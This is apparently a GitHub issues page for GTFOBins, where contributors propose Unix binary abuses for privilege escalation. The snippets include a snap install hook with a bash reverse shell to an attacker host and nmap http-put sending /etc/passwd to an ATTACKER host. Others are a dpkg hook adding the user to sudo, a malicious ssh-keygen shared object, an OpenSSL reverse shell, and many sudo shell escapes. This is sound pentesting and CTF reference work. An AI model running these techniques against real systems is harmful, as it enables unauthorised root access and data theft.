
gtfobins / gtfobins.github.io


GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems

Home Page: https://gtfobins.github.io

License: GNU General Public License v3.0

Ruby 0.28% Makefile 1.38% HTML 59.82% Emacs Lisp 0.23% Python 11.40% SCSS 26.89%
binaries bind-shell blueteam bypass exfiltration gtfobins linux post-exploitation redteam reverse-shell unix

gtfobins.github.io's People

Contributors

0x020b, anon-exploiter, bcoles, bstapes, cimihan123, cyrus-and, d4t4s3c, dependabot[bot], dubek, egre55, emanuelduss, epinna, godylockz, haqpl, linuxsploit, minatotw, mirchr, nosferatuvjr, pad0van, ritiksahni, roman-mueller, rootup, shadawck, sk3l10x1ng, sleestakoverflow, synacktivcerv, unicks, valdaarhun, xmpf, yutayamate


gtfobins.github.io's Issues

Please add NodeJS

Reading text file in NodeJS:

require('fs').readFile('/path/to/file', {encoding: 'utf-8'}, function(err, data) {
        console.log(data);
});

ispell / contributing

It's the same if it's suid, but it's not by default anywhere I can think of.

sudo ispell <file with misspelled words according to dictionary>
!sh

Caveat: if not specified, it ships with English dictionaries (I believe both GB and US), but various distributions may package it with the appropriate dictionaries if the system is configured correctly.
I don't come across it as much as aspell, but I come across it plenty.

https://www.cs.hmc.edu/~geoff/ispell.html
https://www.gnu.org/software/ispell/

genisoimage file read

Hello, the given File Read command didn't really work for me, but I found another way to read the file:
genisoimage -sort "$LFILE"

New Function: Wildcard / Parameter Injection

Hi

Before submitting a PR I would like to hear your opinion.

Would it make sense to create a new function for wildcard / parameter injection possibilities?

This function would address all binaries which could be used to execute a function via a command line argument.

A well-known example is the tar command and the arguments --checkpoint-action=exec="chmod +s `which dash`" --checkpoint=1 as e.g. documented here: https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/

I'm aware that this command execution method is already documented in GTFOBins, but it cannot be identified as wildcard or parameter injection. A new category would make sense for me to quickly identify binaries which can be abused for privesc if one or more parameters can be controlled.

What do you think?

THX
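To make the category proposal above concrete, here is an added example (not code from GTFOBins or from the linked tutorial) of the tar wildcard injection the issue refers to. It needs GNU tar, runs entirely unprivileged inside a temporary directory it constructs itself, and only shows that an attacker-chosen filename becomes a tar option whose exec action fires; the privilege comes solely from whoever runs the tar command (a root cron job in the classic case). The marker file name `injected` and the `data.txt` victim file are invented for the demo.

```shell
#!/bin/sh
# Added example: GNU tar argument injection through an unquoted wildcard.
#
# run_tar_with_glob GLOB
#   Builds a throwaway directory with one legitimate file plus two files whose
#   names are tar options, then runs `tar cf /dev/null GLOB` inside it with GLOB
#   left unquoted, exactly as a job such as `tar czf backup.tgz *` would.
#   Prints "injected" if the exec action fired, "clean" otherwise.
run_tar_with_glob() {
  glob=$1
  d=$(mktemp -d)
  touch "$d/data.txt"                                  # what the job meant to archive
  touch "$d/--checkpoint=1"                            # constructed: parsed by tar as an option
  touch "$d/--checkpoint-action=exec=touch injected"   # constructed: command tar will run via sh -c
  # GNU tar accepts options after the archive name, so the expanded filenames
  # are consumed as --checkpoint=1 / --checkpoint-action=exec=... and the
  # action runs in tar's working directory (the trap directory).
  ( cd "$d" && tar cf /dev/null $glob ) >/dev/null 2>&1 || true
  if [ -e "$d/injected" ]; then result=injected; else result=clean; fi
  rm -rf "$d"
  echo "$result"
}

# Same tree, tarred two ways. A bare `*` hands the filenames to tar as options;
# `./*` prefixes every expansion so tar sees paths, never options. Putting `--`
# before the glob has the same effect.
echo "tar cf a.tar *   -> $(run_tar_with_glob '*')"
echo "tar cf a.tar ./* -> $(run_tar_with_glob './*')"
```

The second call is the fix a reviewer would ask for in any script or cron job that globs untrusted directories: anchor the expansion with `./` or terminate option parsing with `--`. Note that neither quoting the glob nor `set -f` helps if the script is meant to archive the directory contents, since the filenames still have to reach tar somehow; only the option terminator or the path prefix stops them from being parsed as options.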

Proposal: Limited File Write Category

Currently all file writes are kept in the single category File Write.

However not all file writes are equal. Some, such as cp, dd, and mv give you full control over the content of the file to be written, which is a powerful primitive and highly exploitable.

Whereas some, such as nmap #153, by the author's own definition "I've yet to come up with a way to overwrite the contents of the system file according to what we want,"

I propose the creation of a Limited File Write category, that allows us to more effectively categorize file writes into bins that either

  • let you control the full content (File Write),
  • vs bins that let you control partial content (Limited or Partial File Write).

I'd be happy to help categorize should this go ahead.

Suggest using here strings in bash

Note that in bash (but not in Bourne shell) you can use <<< (here-string) to put a string in the standard input, instead of echo and pipe. So a file-write operation with tee would be:

./tee -a "$LFILE" <<< 'data'

instead of

echo data | ./tee -a "$LFILE"

This is not specific to tee, but relevant to all uses of echo in this repo. Not sure where is the correct place to mention this.

How to add examples?

For the following binary, https://gtfobins.github.io/gtfobins/ssh-keygen/, the instructions stated in the document are not enough. I would like to add more info, like generating a valid shared object file. How can I add it? If I add it to the description, then it may overwrite the default description. Otherwise I have to add it as a function, but currently I don't see any suitable function for it. Can you add a suitable function for that, or can you guide me on whether it's possible to add examples?


If the author doesn't respond, or for anyone looking for the answer for the ssh-keygen binary, this is how you can generate a valid shared object file. This is very useful when the ssh-keygen binary has the SUID bit set:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/* ssh-keygen -D loads the given .so as a PKCS#11 provider and resolves and
 * calls C_GetFunctionList() from it, so whatever this function does runs with
 * the effective uid of the ssh-keygen process (root when the binary is SUID). */
int C_GetFunctionList(){
    setuid(geteuid());    // make the real uid match the elevated effective uid
    system("id"); //Your command
    printf("\n"); //New line is important
    return 1;             // ssh-keygen will report the provider as broken, but the command has already run
}

Save above file as lib.c and compile using below command:

gcc -shared -o lib.so -fPIC lib.c

Then execute:

ssh-keygen -D ./lib.so

Snap

Some versions of Snap will not try to install a package with a single character as its name. Snap's GTFOBin can be made more widely usable by changing fpm -n x -s dir -t snap -a all meta to something like fpm -n test -s dir -t snap -a all meta and likewise sudo snap install x_1.0_all.snap --dangerous --devmode to sudo snap install test_1.0_all.snap --dangerous --devmode.

Without this change, snap will error out with error: cannot read snap file: invalid snap name: "x" and not execute the given command.

New apt sub command exploit

Hi,

Would you be interested in a way to exploit this kind of sudo rules?

%grp ALL=(ALL:ALL) /usr/bin/apt-get install *
%grp ALL=(ALL:ALL) /usr/bin/apt-get remove *

I see you already have it for apt-get but sometimes sysadmins will only allow sub commands of apt, thinking that they are safe this way.

Inventory notification

Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/resources.html#GTFOBins

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

  • Open source: All information is available and up to date. If a piece of information is missing or deprecated, you are invited to (help us).
  • Practical: Content is categorized and table formatted, allowing you to search, browse, sort and filter.
  • Fast: Uses static and client side technologies, resulting in fast browsing.
  • Rich tables: search, sort, browse, filter, clear
  • Fancy informational popups
  • Badges / Shields
  • Static API
  • Twitter bot

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why?

  • Specialized websites: Some websites reference tools, but additional information is not available or browsable. Making additional searches takes time.
  • Curated lists: Curated lists are not very exhaustive, up to date or browsable, and are very topic specific.
  • Search engines: Search engines sometimes find nothing; some tools or resources are too unknown or not referenced. This is where crowdsourcing is better than robots.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.

Badges

The badge shows your community that you are inventoried. This also shows you care about your project and want it to grow, and that your tool is not abandonware.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that Rawsec's CyberSecurity Inventory, but there are several styles available.

Want to thank us?

If you want to thank us, you can help make the project better known by tweeting about it! For example: Twitter URL

So what?

That's all, this message is just to notify you if you care.

[dpkg] priv esc

dpkg -i -o DPkg::Pre-Install-Pkgs::="usermod -a -G sudo $(whoami)" any_package.deb

How to use File read escalation

Hi,

I just want to know if I understand the information here correctly.
Supposedly for cat, a File read means that it will read data outside a restricted file system.
I tried to run this in Ubuntu.

LFILE=/root/my_file.txt
cat "$LFILE"

However it still gave me "Permission denied"
Is there a limitation for this to work?

Thanks.

No binary matches...

I uploaded your code to hacksudo.github.io but am unable to get search results; the issue is:

Binary Functions
No binary matches...

Snap [New Feature]

Hello!
I noticed in https://gtfobins.github.io, there isn't anything mentioned for ways to GTFO of snap ... "i.e. snap install".
There was a recent CTF machine where this was a way to get root taking advantage of the sudo permissions:
(root) NOPASSWD: /usr/bin/snap install *

Here are some references on how to exploit this:
https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py

Here is a script I wrote using the references above, updated to reflect my environment.
Note: my firewall was affecting the build process, so I temporarily disable it in this script.
./buildSnap.sh

## Install necessary tools
sudo snap install snapcraft --classic

## Disable firewall
sudo ufw disable

## Make an empty directory to work with
cd ~/Documents
mkdir revshell_snap
cd revshell_snap

## Initialize the directory as a snap project
snapcraft init

## Set up the install hook
mkdir snap/hooks
touch snap/hooks/install
chmod a+x snap/hooks/install

## Write the script we want to execute as root
cat > snap/hooks/install << "EOF"
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/attackerip/attackerport 0>&1'
EOF

## Configure the snap yaml file
cat > snap/snapcraft.yaml << "EOF"
name: revshell
base: core
version: '1.0' 
summary: Runs exploit bash script when installed
description: Runs exploit bash script when installed
grade: devel
confinement: devmode
parts:
  my-part:
    plugin: nil
EOF

## Build the snap
snapcraft

## Re-enable firewall
sudo ufw enable

## Move
mv revshell_1.0_amd64.snap ../revshell.snap

Then you would install the snap and it would run the install hook script when it installs ...
sudo snap install revshell.snap --dangerous --devmode

Let me know if this is something worth adding to the GTFOBins repository going forward!
Thanks!

Additional wireshark trick

If the wireshark gui loads the Lua plugin then it is possible to execute any Lua code.

Tools -> Lua -> Evaluate:

os.execute("xterm")

gcc can also be used for file read

While doing the challenges for the first module of pwn.college I found a way to read files with an SUID version of gcc.

Following the format of other examples, this is how to reproduce:

sudo sh -c 'cp $(which gcc) .; chmod +s ./gcc'

LFILE=file_to_read
./gcc -x c "$LFILE"

Assuming the privileged file is not valid C code, much if not all of its lines should be output within syntax error messages.

Is this the kind of example that would be worth adding?

Question about its use

First of all thanks for this interesting project.
I've already made a post on (sorry for the cross-post)
https://security.stackexchange.com/questions/197900/command-line-tools-exploitable-on-linux
But I've decided to post here too because I'm interested in your opinion.
As said in the post above, why do you consider mv (it's only an example) a dangerous command line tool?
Ok, I can write to a file I don't have permission for if the SUID bit is set, but:

  1. Every file with the SUID bit can be potentially dangerous
  2. I've never seen mv with SUID bit set in any distribution

Why have you "blacklisted" this command?
I've the same doubts on other commands.

top can give a shell

Good day,

https://manpages.debian.org/stretch/procps/top.1.en.html#6c._ADDING_INSPECT_Entries
https://gitlab.com/procps-ng/procps/blob/master/top/top.c#L2996

It's a bit of a pain, since it requires an arbitrary append to ~/.toprc to add a custom inspect entry, and it's really picky about the file format. Example: choose W to write a default ~/.toprc, then append (^I denotes a tab character):

...
pipe^IRun arbitrary code as root^Iid

Then run top and choose Y to inspect a process, and choose your custom inspect entry:

Inspection View at pid: 3986, running myprocess.  Locating:  N/A
Use:  left/right/up/down/etc to navigate the output; 'L'/'&' to locate/next.
Or:   <Enter> to select another; 'q' or <Esc> to end !
Run arbitrary code as root: 1-1 lines,   1-121 columns, 77 bytes read
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

Is this worth writing up in a pull request? It might be a while before I get to it. If someone else wants the glory, it's cool with me. 😁

Fix for sudo from NPM binary

It would be interesting to add a second line assigning permissions to the user you would like to escalate to, since NPM needs write permission on the folder you create.

TF=$(mktemp -d)
chmod 777 $TF                       # the target user must be able to write into the project directory
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo -u serv-manage npm -C $TF --unsafe-perm i   # same directory as above, not a hard-coded /tmp path

Thanks.

ruby CAP_CHOWN capability

Hey there. I was doing a CTF and didn't see a cap_chown related capability in Ruby.
I thought it would be great to add the following to the Ruby CAPABILITIES section.

echo "File.chown(id,nil,'/file/to/chown')" > chown.rb
chmod +x chown.rb
ruby chown.rb

Example:

echo "File.chown(1003,nil,'/etc/shadow')" > chown.rb

License

Is there a license for using this?
I have an idea for a project and want to make sure I'm not going to be breaking any license.

Lots of "use of privileges results in use of privileges"

There are a lot of things listed here that are examples of "use of privileges results in use of privileges". As an example, your listing for cat includes:

File read -
"It reads data from files," - It sure does!
"it may be used to do privileged reads" - Iff the parent process is privileged, in which case, the cat (no pun intended) is out of the bag.
"or disclose files outside a restricted file system." - What does that even mean?

This applies to all instances of "File read", not just cat.

SUID -
"It runs with the SUID bit set" - Not on my box. Not on anybody's box (within experimental error).
"This example creates a local SUID copy of the binary and runs it to maintain elevated privileges." - If you have the capability to add SUID to cat, you don't need to add SUID to cat.

This applies to all instances of "SUID", not just cat.

Sudo -
"It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo." - That's literally what sudo is designed to do. Running sudo results in elevated privileges, by design.

This applies to all instances of "Sudo", not just cat.

Using 7zr as a file write

I just recently used 7zr on Linux as a way of adding a python file to an archive and then extracting it into a root owned directory as an unprivileged user.

We should add this as another method when sudo privileges are set on 7zr.

[Enhancement/Bug] OpenSSL reverse shell

Specs

Terminal: termite V15
Ncat version: 7.80
OpenSSL version: OpenSSL 1.1.1e 17 Mar 2020
OS: Arch Linux
Kernel: 5.5.10.a-1-hardened

Issue

Hi guys!

I had a lot of issues with the OpenSSL reverse shell, like disconnections, latency, etc. I found out after some tests that the flag -no_ign_eof causes issues when you upgrade your shell to a fully interactive tty.

Example with screens:

Attacker box:

ncat --ssl -lnvp 4444 or openssl s_server -quiet -cert /tmp/cert.pem -key /tmp/key.pem -port 4444

Screenshot_2020-03-21_16-22-34

Victim box:

rm /tmp/s; mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect localhost:4444 > /tmp/s; rm /tmp/s

Screenshot_2020-03-21_16-23-19

I then initiate the procedure to upgrade to a fully interactive tty shell

SHELL=/bin/bash script -q /dev/null
CTRL+Z
stty raw -echo
fg
reset

Then at this point, if I do an uppercase "R": it crashes my reverse shell with the following information:

RENEGOTIATING
119157357475136:error:1420410A:SSL routines:SSL_renegotiate:wrong ssl version:ssl/ssl_lib.c:2127:

Screenshot_2020-03-21_16-27-10

UPDATE: it's the same with a lowercase "k": it crashes but with the "KEYUPDATE" reason.


If I remove the -no_ign_eof, I do not have any problem with the reverse shell and I can do an uppercase "R" when upgrading my OpenSSL reverse shell without connection crash/disconnection.

My question is:

Is this argument really necessary? I did not encounter any problem while not using it, though it may need more testing. Are you able to reproduce this on your side?

Regards

New function? Port forwarding

ssh, nc/ncat/socat/openssl, bash /dev/tcp redirects, et al can be used to forward ports to access more systems.

If you have a 3-machine ssh-chain, say A->B->C, where B->C is a forced ssh command, then unless the forced command includes -e none you can interact with this second client using ~~C (a tilde per ssh client in the chain) to add -L, -R, and -D forwards. It is common for servers with forced commands to block port forwarding, but easy to not know about the escape sequence which effectively re-enables them under this (rare) configuration.
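As an added illustration, not part of the original issue, here is the server-side configuration on the final hop (C in the chain above) that makes the client-side escape irrelevant. The `~C` escape is interpreted by the ssh client running on B, so `-e none` only removes the escape from that client; whether a forward is actually opened is decided by sshd on C, and that is where it has to be refused. The user name, script path and key are placeholders.

```text
# /etc/ssh/sshd_config on C: refuse every forwarding feature for the restricted
# account, no matter what the client requests through ~C / -L / -R / -D
Match User backup
    AllowTcpForwarding no
    AllowStreamLocalForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no
    ForceCommand /usr/local/bin/backup-only.sh
    # OpenSSH 7.4+ collapses the three forwarding lines above into one:
    # DisableForwarding yes

# Equivalent per-key restriction in ~backup/.ssh/authorized_keys on C,
# useful when the restriction should follow the key rather than the account:
command="/usr/local/bin/backup-only.sh",no-port-forwarding,no-agent-forwarding,no-X11-forwarding,no-pty ssh-ed25519 AAAA... backup@B
```

A quick check from B is to open the chained session, type `~~C` followed by `-L 9999:127.0.0.1:22` and confirm that sshd on C refuses the request rather than silently opening the port; if the forward succeeds, the restriction is only on the client side and can be bypassed exactly as the issue describes.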

New bins

Sorry for opening an issue and not doing a PR, but I don't have a lot of time; you will do it faster than me.
These new ways are from the FallofSudo project.

Here are some other tools:

  • smbclient
    Connect to a valid SMB or CIFS share (the UNC path must be quoted, otherwise the shell eats the backslashes):
    sudo smbclient '\\ip\share' -U username
    smb: \> !/bin/bash
  • mysql
    sudo mysql -e '\! /bin/bash'
  • apt-get
    sudo apt-get changelog bash
    !/bin/bash

nmap read/write tricks

Hello.
Sorry, I don't have enough time to create a pull request.
I want to suggest a few tricks that helped me with exploiting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to the file system.

arbitrary file read

nc -nv -lp 80
nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'

arbitrary file write

php -S 0.0.0.0:80 -t . router_with_directory_listing.php
nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'
